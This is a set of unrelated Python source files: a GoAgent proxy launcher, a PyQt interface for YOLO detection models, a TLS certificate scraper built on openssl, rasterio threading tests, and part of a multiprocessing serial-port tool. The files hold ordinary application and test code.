# Yad Smood <y.s.inside@gmail.com>
# Chen Shuang <cs0x7f@gmail.com>
# cnfuyu <cnfuyu@gmail.com>
# cuixin <steven.cuixin@gmail.com>
import sys
import os
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir))
data_path = os.path.join(root_path, 'data')
data_gae_proxy_path = os.path.join(data_path, 'gae_proxy')
python_path = os.path.abspath( os.path.join(root_path, 'python27', '1.0'))
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
if sys.platform == "win32":
win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
sys.path.append(win32_lib)
elif sys.platform.startswith("linux"):
linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
sys.path.append(linux_lib)
elif sys.platform == "darwin":
darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
sys.path.append(darwin_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
sys.path.append(extra_lib)
import time
import traceback
import platform
import random
import threading
import urllib2
__file__ = os.path.abspath(__file__)
if os.path.islink(__file__):
__file__ = getattr(os, 'readlink', lambda x: x)(__file__)
work_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(work_path)
def create_data_path():
if not os.path.isdir(data_path):
os.mkdir(data_path)
if not os.path.isdir(data_gae_proxy_path):
os.mkdir(data_gae_proxy_path)
create_data_path()
from config import config
from xlog import Logger
if config.log_file:
log_file = os.path.join(data_gae_proxy_path, "local.log")
else:
log_file = None
xlog = Logger(buffer_size=500, file_name=log_file)
from cert_util import CertUtil
import pac_server
import simple_http_server
import proxy_handler
import connect_control
import env_info
import connect_manager
from gae_handler import spawn_later
# launcher/module_init will check this value for start/stop finished
ready = False
def pre_start():
def get_windows_running_process_list():
import os
import glob
import ctypes
import collections
Process = collections.namedtuple('Process', 'pid name exe')
process_list = []
if os.name == 'nt':
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
lpidProcess= (ctypes.c_ulong * 1024)()
cb = ctypes.sizeof(lpidProcess)
cbNeeded = ctypes.c_ulong()
ctypes.windll.psapi.EnumProcesses(ctypes.byref(lpidProcess), cb, ctypes.byref(cbNeeded))
nReturned = cbNeeded.value/ctypes.sizeof(ctypes.c_ulong())
pidProcess = [i for i in lpidProcess][:nReturned]
has_queryimage = hasattr(ctypes.windll.kernel32, 'QueryFullProcessImageNameA')
for pid in pidProcess:
hProcess = ctypes.windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
if hProcess:
modname = ctypes.create_string_buffer(2048)
count = ctypes.c_ulong(ctypes.sizeof(modname))
if has_queryimage:
ctypes.windll.kernel32.QueryFullProcessImageNameA(hProcess, 0, ctypes.byref(modname), ctypes.byref(count))
else:
ctypes.windll.psapi.GetModuleFileNameExA(hProcess, 0, ctypes.byref(modname), ctypes.byref(count))
exe = modname.value
name = os.path.basename(exe)
process_list.append(Process(pid=pid, name=name, exe=exe))
ctypes.windll.kernel32.CloseHandle(hProcess)
elif sys.platform.startswith('linux'):
for filename in glob.glob('/proc/[0-9]*/cmdline'):
pid = int(filename.split('/')[2])
exe_link = '/proc/%d/exe' % pid
if os.path.exists(exe_link):
exe = os.readlink(exe_link)
name = os.path.basename(exe)
process_list.append(Process(pid=pid, name=name, exe=exe))
else:
try:
import psutil
process_list = psutil.get_process_list()
except Exception as e:
xlog.exception('psutil.get_windows_running_process_list() failed: %r', e)
return process_list
if sys.platform == 'cygwin':
xlog.info('cygwin is not officially supported, please continue at your own risk :)')
#sys.exit(-1)
elif os.name == 'posix':
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (8192, -1))
except Exception as e:
pass
elif os.name == 'nt':
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW(u'GoAgent ')
if not config.LISTEN_VISIBLE:
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
else:
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
if config.LOVE_ENABLE and random.randint(1, 100) <= 5:
title = ctypes.create_unicode_buffer(1024)
ctypes.windll.kernel32.GetConsoleTitleW(ctypes.byref(title), len(title)-1)
ctypes.windll.kernel32.SetConsoleTitleW('%s %s' % (title.value, random.choice(config.LOVE_TIP)))
blacklist = {'360safe': False,
'QQProtect': False, }
softwares = [k for k, v in blacklist.items() if v]
if softwares:
tasklist = '\n'.join(x.name for x in get_windows_running_process_list()).lower()
softwares = [x for x in softwares if x.lower() in tasklist]
if softwares:
title = u'GoAgent 建议'
error = u'某些安全软件(如 %s)可能和本软件存在冲突,造成 CPU 占用过高。\n如有此现象建议暂时退出此安全软件来继续运行GoAgent' % ','.join(softwares)
ctypes.windll.user32.MessageBoxW(None, error, title, 0)
#sys.exit(0)
if config.GAE_APPIDS[0] == 'gae_proxy':
xlog.critical('please edit %s to add your appid to [gae] !', config.CONFIG_FILENAME)
sys.exit(-1)
if config.PAC_ENABLE:
pac_ip = config.PAC_IP
url = 'http://%s:%d/%s' % (pac_ip, config.PAC_PORT, config.PAC_FILE)
spawn_later(600, urllib2.build_opener(urllib2.ProxyHandler({})).open, url)
def log_info():
xlog.info('------------------------------------------------------')
xlog.info('Python Version : %s', platform.python_version())
xlog.info('OS : %s', env_info.os_detail())
xlog.info('Listen Address : %s:%d', config.LISTEN_IP, config.LISTEN_PORT)
if config.CONTROL_ENABLE:
xlog.info('Control Address : %s:%d', config.CONTROL_IP, config.CONTROL_PORT)
if config.PROXY_ENABLE:
xlog.info('%s Proxy : %s:%s', config.PROXY_TYPE, config.PROXY_HOST, config.PROXY_PORT)
xlog.info('GAE APPID : %s', '|'.join(config.GAE_APPIDS))
if config.PAC_ENABLE:
xlog.info('Pac Server : http://%s:%d/%s', config.PAC_IP, config.PAC_PORT, config.PAC_FILE)
#info += 'Pac File : file://%s\n' % os.path.join(self.DATA_PATH, self.PAC_FILE)
xlog.info('------------------------------------------------------')
def main():
global ready
connect_control.keep_running = True
config.load()
connect_manager.https_manager.load_config()
xlog.debug("## GAEProxy set keep_running: %s", connect_control.keep_running)
# to profile gae_proxy, run proxy.py, visit some web by proxy, then visit http://127.0.0.1:8084/quit to quit and print result.
do_profile = False
if do_profile:
import cProfile, pstats
pr = cProfile.Profile()
pr.enable()
global __file__
__file__ = os.path.abspath(__file__)
if os.path.islink(__file__):
__file__ = getattr(os, 'readlink', lambda x: x)(__file__)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
#xlog.basicConfig(level=xlog.DEBUG if config.LISTEN_DEBUGINFO else xlog.INFO, format='%(levelname)s - %(asctime)s %(message)s', datefmt='[%b %d %H:%M:%S]')
pre_start()
log_info()
CertUtil.init_ca()
proxy_daemon = simple_http_server.HTTPServer((config.LISTEN_IP, config.LISTEN_PORT), proxy_handler.GAEProxyHandler)
proxy_thread = threading.Thread(target=proxy_daemon.serve_forever)
proxy_thread.setDaemon(True)
proxy_thread.start()
if config.PAC_ENABLE:
pac_daemon = simple_http_server.HTTPServer((config.PAC_IP, config.PAC_PORT), pac_server.PACServerHandler)
pac_thread = threading.Thread(target=pac_daemon.serve_forever)
pac_thread.setDaemon(True)
pac_thread.start()
ready = True # checked by launcher.module_init
while connect_control.keep_running:
time.sleep(1)
xlog.info("Exiting gae_proxy module...")
proxy_daemon.shutdown()
proxy_daemon.server_close()
proxy_thread.join()
if config.PAC_ENABLE:
pac_daemon.shutdown()
pac_daemon.server_close()
pac_thread.join()
ready = False # checked by launcher.module_init
xlog.debug("## GAEProxy set keep_running: %s", connect_control.keep_running)
if do_profile:
pr.disable()
pr.print_stats()
# called by launcher/module/stop
def terminate():
xlog.info("start to terminate GAE_Proxy")
connect_control.keep_running = False
xlog.debug("## Set keep_running: %s", connect_control.keep_running)
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc(file=sys.stdout)
except KeyboardInterrupt:
terminate()
sys.exit()
|
main_widget.py
|
# -*- coding: utf-8 -*-
import sys
import os
import time
import torch
if hasattr(sys, 'frozen'):
os.environ['PATH'] = sys._MEIPASS + ";" + os.environ['PATH']
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui, uic
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWebEngineWidgets import *
from image_widget import ImageWidget
from common_utils import get_api_from_model
import threading
import qdarkstyle
import json
try:
import queue
except ImportError:
import Queue as queue
# ui配置文件
cUi, cBase = uic.loadUiType("main_widget.ui")
# 主界面
class MainWidget(QWidget, cUi):
log_sig = pyqtSignal(str)
def __init__(self): #, main_widget=None):
# 设置UI
QMainWindow.__init__(self)
cUi.__init__(self)
self.setupUi(self)
# read info
with open('./info.json', 'r') as f:
self.info = json.load(f)
# init title
self.setWindowTitle(self.info['version'])
icon = QIcon()
icon.addPixmap(QPixmap('./icons/logo.png'))
self.setWindowIcon(icon)
# init imagewidget
self.cImageWidget = ImageWidget()
self.cImageWidget.set_alg_handle(self)
self.tabWidget.insertTab(0, self.cImageWidget, "预测")
self.tabWidget.setTabIcon(0, QIcon(QPixmap("./icons/no_news.png")))
# init config widget
self.btnSaveCfg.hide()
self.tabWidget.setTabIcon(1, QIcon(QPixmap("./icons/no_news.png")))
# init help widget
self.has_news = False
self.cBrowser = QWebEngineView()
webEngineSettings = self.cBrowser.settings()
webEngineSettings.setAttribute(QWebEngineSettings.LocalStorageEnabled, False)
engineProfile = self.cBrowser.page().profile()
engineProfile.clearHttpCache()
cookie = engineProfile.cookieStore()
cookie.deleteAllCookies()
self.cBrowser.load(QUrl('http://www.lgddx.cn/projects/yolo_all/news/index.htm'))
self.tabWidget.insertTab(2, self.cBrowser, "帮助")
self.tabWidget.setTabIcon(2, QIcon(QPixmap("./icons/no_news.png")))
# show imagewidget
self.tabWidget.setCurrentIndex(0)
# init treewidget
self.treeModel.header().setVisible(False)
# init log
self.log_sig.connect(self.slot_log_info)
self.alg = None
self.alg_name = None
self.model_name = None
self.model_cfg = None
self.model_cfg_widget = {}
self.alg_model_map = {}
self.det_thread_flag = True
self.det_thread_queue = queue.Queue(maxsize=2)
self.det_thread_handle = threading.Thread(target=self.det_thread_func, args=())
self.det_thread_handle.start()
self.update_model_flag = False
self.create_model_process = 0
self.create_process_dialog = None
def slot_log_info(self, info):
if str(info).startswith('cmd:'):
if 'load models finished' in str(info):
self.init_model_tree()
if 'start create model' in str(info):
self.tabWidget.setCurrentIndex(0)
self.cImageWidget.change_background('start_load')
if 'create model failed' in str(info):
self.cImageWidget.change_background('load_fail')
if 'create model success' in str(info):
self.cImageWidget.change_background('load_success')
if 'pretrain unget' in str(info):
box_message = str(info).split('=')[-1]
box = QMessageBox()
box.setIcon(QMessageBox.Critical)
box.setTextInteractionFlags(Qt.TextSelectableByMouse)
box.setWindowTitle(u"预训练模型未下载")
box.setText(box_message)
box.setTextInteractionFlags(Qt.TextSelectableByMouse)
box.exec()
if 'update title' in str(info):
title_name = str(info).split('=')[-1]
self.setWindowTitle(title_name)
elif str(info).startswith('news_id'):
self.tabWidget.setTabIcon(2, QIcon(QPixmap("./icons/news.png")))
else:
self.logEdit.append('<font color="#FF9090">%s</font>'%(info))
def check_news(self, x):
lines = x.split('\n')
for line in lines:
if 'news_id' in line:
id = int(line.split(':')[-1])
if id != self.info['news_id']:
self.info['news_id'] = id
self.has_news = True
with open('./info.json', 'w') as f:
json.dump(self.info, f)
self.log_sig.emit('news_id')
break
def det_thread_func(self):
self.log_sig.emit('检测线程启动')
# search all algs
self.search_alg_and_model()
# check news_id
self.cBrowser.page().toPlainText(self.check_news)
while self.det_thread_flag:
if self.update_model_flag:
self.updaet_model()
self.update_model_flag = False
try:
img = self.det_thread_queue.get(block=True, timeout=0.2)
#self.log_sig.emit('det thread get a img')
except queue.Empty:
img = None
#self.log_sig.emit('det thread get waiting for img')
if img is not None and self.alg is not None:
start_time = time.time()
ret = self.alg.inference(img)
if self.cImageWidget is not None:
time_spend = time.time()-start_time
if 'result' not in self.model_cfg.keys():
save_result = 0
save_path = None
else:
save_result = int(self.model_cfg['result']['save_result'])
save_path = self.model_cfg['result']['save_dir']
self.cImageWidget.slot_alg_result(img, ret, time_spend, save_result, save_path)
def add_img(self, img):
if self.det_thread_queue.full():
return
else:
self.det_thread_queue.put(img)
def search_alg_and_model(self):
self.alg_model_map = {}
self.log_sig.emit('>开始加载模型,请等待所有模型加载成功')
for sub_dir in os.listdir('./model_zoo'):
self.log_sig.emit('>>正在加载模型: %s'%str(sub_dir))
sub_path = os.path.join('./model_zoo', sub_dir)
if os.path.isdir(sub_path):
api = get_api_from_model(str(sub_dir))
if api is not None:
self.alg = api.Alg()
self.alg_model_map[str(sub_dir)] = self.alg.get_support_models()
self.log_sig.emit('>>加载模型: %s 成功'%str(sub_dir))
else:
self.alg_model_map[str(sub_dir)] = []
self.log_sig.emit('>>加载模型: %s 失败'%str(sub_dir))
self.log_sig.emit('>加载模型结束')
self.log_sig.emit('cmd:load models finished')
def init_model_tree(self):
for alg in self.alg_model_map.keys():
item_alg = QTreeWidgetItem(self.treeModel)
#item_alg.setFlags(Qt.ItemIsEnabled)
item_alg.setText(0, alg)
for model in self.alg_model_map[alg]:
item_model = QTreeWidgetItem(item_alg)
item_model.setText(0, model)
def updaet_model(self):
self.log_sig.emit('cmd:start create model')
self.log_sig.emit('开始创建模型: %s'%str(self.model_name))
self.log_sig.emit(' 停止ImageWidget')
self.cImageWidget.stop_all()
title_name = 'YoloAll V2.0.0 当前模型:' + self.model_name
pretrain_path = './model_zoo/' + self.alg_name + '/' + self.model_cfg['normal']['weight']
if not os.path.exists(pretrain_path):
self.log_sig.emit(' 创建模型: %s 失败,预训练模型未下载'%str(self.model_name))
box_info = u'请到如下地址下载预训练模型\n放到 model_zoo/%s 下面\n下载地址:\n%s'%(self.alg_name, self.model_cfg['normal']['url'])
self.log_sig.emit('cmd:pretrain unget=%s'%box_info)
self.alg = None
return
if self.alg is not None:
device = 'cuda' if self.model_cfg['device']['dev_type'] == 'gpu' else 'cpu'
title_name += ' 设备类型:' + device
self.log_sig.emit(' 设备类型:' + device)
self.alg.create_model(self.model_name, device)
self.log_sig.emit('cmd:create model success')
self.log_sig.emit(' 创建模型: %s 结束'%str(self.model_name))
else:
self.log_sig.emit('cmd:create model failed')
self.log_sig.emit(' 创建模型: %s 失败,算法句柄尚未创建'%str(self.model_name))
self.alg = None
self.log_sig.emit('cmd:update title=%s'%(title_name))
def _translate_str(self, ori_str):
translate_map = {'device': '设备配置',
'dev_type': '设备类型(cpu/gpu)',
'result': '检测结果配置',
'save_result': '是否保存结果',
'save_dir': '保存路径',
'normal': '通用配置',
}
if ori_str in translate_map.keys():
return translate_map[ori_str]
else:
return ori_str
def _init_cfg_widget(self):
old_items = []
for i in range(self.cfg_layout.count()):
old_items.append(self.cfg_layout.itemAt(i))
for old_item in old_items:
self.cfg_layout.removeItem(old_item)
self.model_cfg_widget = {}
if self.alg is not None:
self.btnSaveCfg.show()
self.model_cfg = self.alg.get_model_cfg(self.model_name)
for key in self.model_cfg.keys():
label_title = QLabel()
label_title.setText('<font color="#FF9090">%s</font>'%(self._translate_str(key)))
self.cfg_layout.addWidget(label_title)
self.model_cfg_widget[key] = {}
for sub_key in self.model_cfg[key]:
frame = QFrame()
edit_layout = QHBoxLayout()
edit_key = QLineEdit()
edit_value = QLineEdit()
edit_key.setText(self._translate_str(sub_key))
edit_key.setReadOnly(False)
edit_key.setFocusPolicy(Qt.NoFocus)
edit_value.setText(str(self.model_cfg[key][sub_key]))
edit_layout.addWidget(edit_key)
edit_layout.addWidget(edit_value)
edit_layout.setStretch(0, 1)
edit_layout.setStretch(1, 2)
self.cfg_layout.addLayout(edit_layout)
self.model_cfg_widget[key][sub_key] = edit_value
label_space = QLabel()
self.cfg_layout.addWidget(label_space)
spacer = QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.cfg_layout.addItem(spacer)
def _get_cfg_widget(self):
for key in self.model_cfg_widget.keys():
for sub_key in self.model_cfg_widget[key].keys():
edit_widget = self.model_cfg_widget[key][sub_key]
old_cfg_value = self.model_cfg[key][sub_key]
new_cfg_value = edit_widget.text()
if sub_key == 'dev_type':
if new_cfg_value != 'cpu':
if not torch.cuda.is_available():
reply = QMessageBox.warning(self,
u'警告',
u'当前pytorch不支持cuda, 将创建cpu模型',
QMessageBox.Yes)
edit_widget.setText('cpu')
new_cfg_value = 'cpu'
self.model_cfg[key][sub_key] = new_cfg_value
def on_treeModel_itemClicked(self, item, seq):
print(item.text(0), item.parent())
if item.parent() is None:
print('you select alg')
else:
print('yolo select model: ', item.parent().text(0), item.text(0))
self.alg_name = item.parent().text(0)
self.model_name = item.text(0)
api = get_api_from_model(self.alg_name)
if api is None:
self.alg = None
print('error, the api can not import')
else:
self.alg = api.Alg()
self._init_cfg_widget()
#self.updaet_model()
self.update_model_flag = True
@pyqtSlot()
def on_btnSaveCfg_clicked(self):
print('button btnSaveCfg clicked')
self._get_cfg_widget()
self.alg.put_model_cfg(self.model_name, self.model_cfg)
#self.updaet_model()
self.update_model_flag = True
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message',"Are you sure to quit?",
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
self.cImageWidget.stop_all()
self.det_thread_flag = False
self.det_thread_handle.join()
else:
event.ignore()
if __name__ == "__main__":
cApp = QApplication(sys.argv)
cMainWidget = MainWidget()
cApp.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyqt5'))
cMainWidget.show()
sys.exit(cApp.exec_())
|
cert_scrape.py
|
#!/usr/bin/python3
# x509-cert-testcorpus - X.509 certificate test corpus
# Copyright (C) 2018-2019 Johannes Bauer
# License: CC-0
import sys
import sqlite3
import contextlib
import subprocess
import multiprocessing
import hashlib
import time
import collections
import random
import re
from CertDatabase import CertDatabase
from FriendlyArgumentParser import FriendlyArgumentParser
parser = FriendlyArgumentParser(description = "Scrape certificates from websites.")
parser.add_argument("-d", "--domainname-dbfile", metavar = "filename", type = str, default = "certs/domainnames.sqlite3", help = "Specifies database file that contains the domain names to scrape. Defaults to %(default)s.")
parser.add_argument("-g", "--gracetime", metavar = "secs", type = float, default = 1, help = "Gracetime between scrapings of different domains, in seconds. Defaults to %(default).1f seconds.")
parser.add_argument("-p", "--parallel", metavar = "processes", type = int, default = 20, help = "Numer of concurrent processes that scrape. Defaults to %(default)d.")
parser.add_argument("-t", "--timeout", metavar = "secs", type = int, default = 15, help = "Timeout after which connection is discarded, in seconds. Defaults to %(default)d.")
parser.add_argument("-a", "--maxage", metavar = "days", type = int, default = 365, help = "Age after which another attempt is retried, in days. Defaults to %(default)d.")
parser.add_argument("-l", "--limit", metavar = "count", type = int, help = "Quit after this amount of calls.")
parser.add_argument("-c", "--certdb", metavar = "path", type = str, default = "certs", help = "Specifies the path of the certificate database. Defaults to %(default)s.")
parser.add_argument("--skip-local-db-update", action = "store_true", help = "Do not try to update the domainname database file from the actual certificate content database.")
parser.add_argument("domainname", nargs = "*", help = "When explicit domain names are supplied on the command line, only those are scraped and the max age is disregarded.")
args = parser.parse_args(sys.argv[1:])
class CertRetriever():
_CERT_RE = re.compile("-----BEGIN CERTIFICATE-----[A-Za-z0-9+/=\s]+-----END CERTIFICATE-----", flags = re.MULTILINE)
def __init__(self, timeout):
self._timeout = timeout
def _parse_certs(self, openssl_output):
output_text = openssl_output.decode("utf-8", errors = "replace")
certs = [ ]
for match in self._CERT_RE.finditer(output_text):
cert_text = match.group(0).encode("ascii")
der_cert = subprocess.check_output([ "openssl", "x509", "-outform", "der" ], input = cert_text)
certs.append(der_cert)
return certs
def retrieve(self, servername, port = 443):
cmd = [ "openssl", "s_client", "-showcerts", "-connect", "%s:%d" % (servername, port), "-servername", servername ]
proc = subprocess.Popen(cmd, stdin = subprocess.DEVNULL, stdout = subprocess.PIPE, stderr = subprocess.DEVNULL)
try:
proc.wait(timeout = self._timeout)
if proc.returncode == 0:
stdout = proc.stdout.read()
try:
der_certs = self._parse_certs(stdout)
return ("ok", der_certs)
except subprocess.CalledProcessError:
# Did not contain certificate?
return ("nocert", None)
else:
# Failed with error
return ("error", None)
except subprocess.TimeoutExpired:
# Process unresponsive
proc.kill()
return ("timeout", None)
class Scraper():
def __init__(self, args):
self._args = args
self._db = sqlite3.connect(self._args.domainname_dbfile)
self._cursor = self._db.cursor()
with contextlib.suppress(sqlite3.OperationalError):
self._cursor.execute("""
CREATE TABLE domainnames (
domainname PRIMARY KEY NOT NULL,
last_successful_timet integer NOT NULL,
last_attempted_timet integer NOT NULL,
last_result NULL
);
""")
self._domainnames = [ ]
self._total_domain_count = 0
self._cert_retriever = CertRetriever(self._args.timeout)
self._certdb = CertDatabase(self._args.certdb)
if not self._args.skip_local_db_update:
self._update_local_database()
def _update_local_database(self):
most_recent_connections = self._certdb.get_most_recent_connections()
connection_count = len(most_recent_connections)
print("Updating local index from %d recent connections within certificate database..." % (connection_count))
for (entry_no, (servername, fetch_timestamp)) in enumerate(most_recent_connections):
if (entry_no % 20000) == 0:
print("Updating %d/%d (%.1f%%)" % (entry_no, connection_count, entry_no / connection_count * 100))
row = self._db.execute("SELECT last_attempted_timet FROM domainnames WHERE domainname = ?;", (servername, )).fetchone()
if row is None:
# Servername not yet known in domainnames.sqlite3, insert it.
self._db.execute("INSERT INTO domainnames (domainname, last_successful_timet, last_attempted_timet, last_result) VALUES (?, ?, ?, 'ok');", (servername, fetch_timestamp, fetch_timestamp))
else:
last_timestamp_domainnames = row[0]
if last_timestamp_domainnames < fetch_timestamp:
# We have a newer one in the actual dataset, update metadata database
self._db.execute("UPDATE domainnames SET last_successful_timet = ?, last_attempted_timet = ?, last_result = 'ok' WHERE domainname = ?;", (fetch_timestamp, fetch_timestamp, servername))
self._db.commit()
def _worker(self, work_queue, result_queue):
while True:
next_job = work_queue.get()
if next_job is None:
break
domainname = next_job
scraped_cert = self._cert_retriever.retrieve(domainname)
result = (next_job, scraped_cert)
result_queue.put(result)
def _feeder(self, work_queue, result_queue):
class BreakFreeException(Exception): pass
fed_items = 0
try:
random.shuffle(self._domainnames)
for domainname in self._domainnames:
fed_items += 1
work_queue.put(domainname)
if (self._args.limit is not None) and (fed_items >= self._args.limit):
raise BreakFreeException()
except BreakFreeException:
pass
# Finally kill all workers
for i in range(self._args.parallel):
work_queue.put(None)
def _eater(self, work_queue, result_queue):
processed_count = 0
new_cert_count = 0
count_by_return = collections.Counter()
while True:
next_result = result_queue.get()
if next_result is None:
break
(domainname, (resultcode, der_certs)) = next_result
processed_count += 1
count_by_return[resultcode] += 1
status_str = [ ]
for (keyword, text) in (("ok", "OK"), ("nocert", "No cert"), ("error", "Error"), ("timeout", "Timeout")):
count = count_by_return[keyword]
if count > 0:
status_str.append("%s %d/%.1f%%" % (text, count, count / processed_count * 100))
status_str = " ".join(status_str)
if resultcode == "ok":
result_comment = " [%d certs]" % (len(der_certs))
else:
result_comment = ""
line_left = "%d/%d (%.1f%%): %s: %s%s" % (processed_count, self._total_domain_count, processed_count / self._total_domain_count * 100, domainname, resultcode, result_comment)
print("%-90s %s" % (line_left, status_str))
now = round(time.time())
if resultcode == "ok":
self._cursor.execute("UPDATE domainnames SET last_successful_timet = ?, last_attempted_timet = ?, last_result = ? WHERE domainname = ?;", (now, now, resultcode, domainname))
self._certdb.insert_connection(servername = domainname, fetch_timestamp = now, certs = der_certs)
new_cert_count += 1
if (new_cert_count % 1000) == 0:
self._certdb.commit()
else:
self._cursor.execute("UPDATE domainnames SET last_attempted_timet = ?, last_result = ? WHERE domainname = ?;", (now, resultcode, domainname))
if (processed_count % 2500) == 0:
self._certdb.commit()
self._db.commit()
self._certdb.commit()
self._db.commit()
def run(self):
candidate_count = self._cursor.execute("SELECT COUNT(DISTINCT domainname) FROM domainnames;").fetchone()[0]
if len(self._args.domainname) == 0:
before_timet = round(time.time() - (86400 * self._args.maxage))
self._domainnames = [ row[0] for row in self._cursor.execute("SELECT domainname FROM domainnames WHERE COALESCE(last_attempted_timet, 0) < ?;", (before_timet, )).fetchall() ]
else:
self._domainnames = self._args.domainname
self._total_domain_count = len(self._domainnames)
if (self._args.limit is not None) and (self._args.limit < self._total_domain_count):
limited_from = self._total_domain_count
self._total_domain_count = self._args.limit
else:
limited_from = None
if self._total_domain_count == 0:
print("Found no domainnames to scrape out of %d candidates." % (candidate_count))
return
else:
if limited_from is None:
limit_str = ""
else:
limit_str = " (limited from %d)" % (limited_from)
print("Found %d domainnames%s to scrape out of %d candidates." % (self._total_domain_count, limit_str, candidate_count))
# Initialize subprocess queues
work_queue = multiprocessing.Queue(maxsize = 100)
result_queue = multiprocessing.Queue(maxsize = 100)
# Start worker processes
processes = [ multiprocessing.Process(target = self._worker, args = (work_queue, result_queue)) for i in range(self._args.parallel) ]
for process in processes:
process.start()
# Start feeder and eater process
feeder = multiprocessing.Process(target = self._feeder, args = (work_queue, result_queue))
eater = multiprocessing.Process(target = self._eater, args = (work_queue, result_queue))
feeder.start()
eater.start()
# Wait for feeder to finish seeding
feeder.join()
# Then wait for all workers to finish
for process in processes:
process.join()
# Finally, quit the eater process as well
result_queue.put(None)
eater.join()
scraper = Scraper(args)
scraper.run()
|
test_threading.py
|
from threading import Thread
import time
import unittest
import rasterio as rio
from rasterio.env import get_gdal_config
class TestThreading(unittest.TestCase):
def test_multiopen(self):
"""
Open a file from different threads.
Regression test for issue #986
"""
def func(delay):
try:
with rio.open('tests/data/RGB.byte.tif'):
time.sleep(delay)
except Exception as err:
global exceptions
exceptions.append(err)
global exceptions
exceptions = []
t1 = Thread(target=func, args=(0.1,))
t2 = Thread(target=func, args=(0,))
with rio.Env():
t1.start()
t2.start() # potential error if Env manages globals unsafely
t1.join()
t2.join()
assert not exceptions
def test_reliability(self):
"""Allow for nondeterminism of race condition"""
for i in range(3):
self.test_multiopen()
def test_child_thread_inherits_env():
"""A new thread inherit's the main thread's env"""
def func():
with rio.Env(lol='wut'):
assert get_gdal_config('lol') == 'wut'
# The next config option will have been set in the main thread.
assert get_gdal_config('FROM_MAIN') is True
t1 = Thread(target=func)
with rio.Env(FROM_MAIN=True):
t1.start()
assert get_gdal_config('FROM_MAIN') is True
assert get_gdal_config('lol') is None
t1.join()
def test_child_thread_isolation():
"""Child threads have isolated environments"""
def func(key, value, other_key):
env = {key: value}
with rio.Env(**env):
assert get_gdal_config(key) == value
# The other key is one set in another child thread.
assert get_gdal_config(other_key) is None
t1 = Thread(target=func, args=('is_t1', True, 'is_t2'))
t2 = Thread(target=func, args=('is_t2', True, 'is_t1'))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
unittest.main()
|
ICOM_P.py
|
#!/usr/bin/python
# -*- coding= utf-8 -*-
import multiprocessing
import os
import sys
from datetime import datetime
from multiprocessing.queues import Queue
from threading import current_thread
import icom_win_msg
import win_instance
import time
from multiprocessing.dummy import Process as dummyProcess
from multiprocessing.dummy import Lock as dummyLock
from icom_ctrl_msg_id import *
import icom_flow_ctrl
NET_SRV_PROCESS_DELAY_START = 1
IN_FROZEN_STATE = False
gui_sync_ctrl_Q = None
processers_count = 1
g_cur_instance_num = 1
#if hasattr(os,'environ') and 'NUMBER_OF_PROCESSORS' in os.environ:
# processers_count = os.environ['NUMBER_OF_PROCESSORS']
# Module multiprocessing is organized differently in Python 3.4+
try:
# Python 3.4+
if sys.platform.startswith('win'):
import multiprocessing.popen_spawn_win32 as forking
else:
import multiprocessing.popen_fork as forking
except ImportError:
import multiprocessing.forking as forking
if sys.platform.startswith('win'):
# First define a modified version of Popen.
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
# Second override 'Popen' class with our modified version.
forking.Popen = _Popen
def gui_process(pro_name,cur_instance_num,win_title,manager_Q,ports_ctrl_Q,tray_ctrl_Q,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,__stdout):
from ICOM_lib import gui_main
if is_in_frozen_state():
sys.stdout = __stdout
sys.stderr = __stdout
gui_main(__stdout,cur_instance_num,win_title,manager_Q,ports_ctrl_Q,tray_ctrl_Q,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status)
def work_ports_process(pro_name,cur_instance_num,win_title,manager_Q,ports_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q):
import ICOM_ports
ICOM_ports.ports_set_vars(manager_Q,ports_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q)
pro_ok = 0
pro_fail = 0
gui_data_Q.put(('READY','PORTS',os.getpid()))
#print ('ports_ctrl_Q',ports_ctrl_Q.qsize(),ports_ctrl_Q.__dict__)
while True: #ctrl quit status
try:
msg_data = ports_ctrl_Q.get()
#if not IN_FROZEN_STATE:
# print ('work',msg_data)
if msg_data[0] == 'QUIT':
ICOM_ports.ports_msg_proc(*msg_data)
break
ICOM_ports.ports_msg_proc(*msg_data)
pro_ok += 1
except Exception as e:
print ('work process exception',e)
pro_fail += 1
pass
print ('work process quit ok:%d,fail:%d\n'%(pro_ok,pro_fail))
os._exit(0)
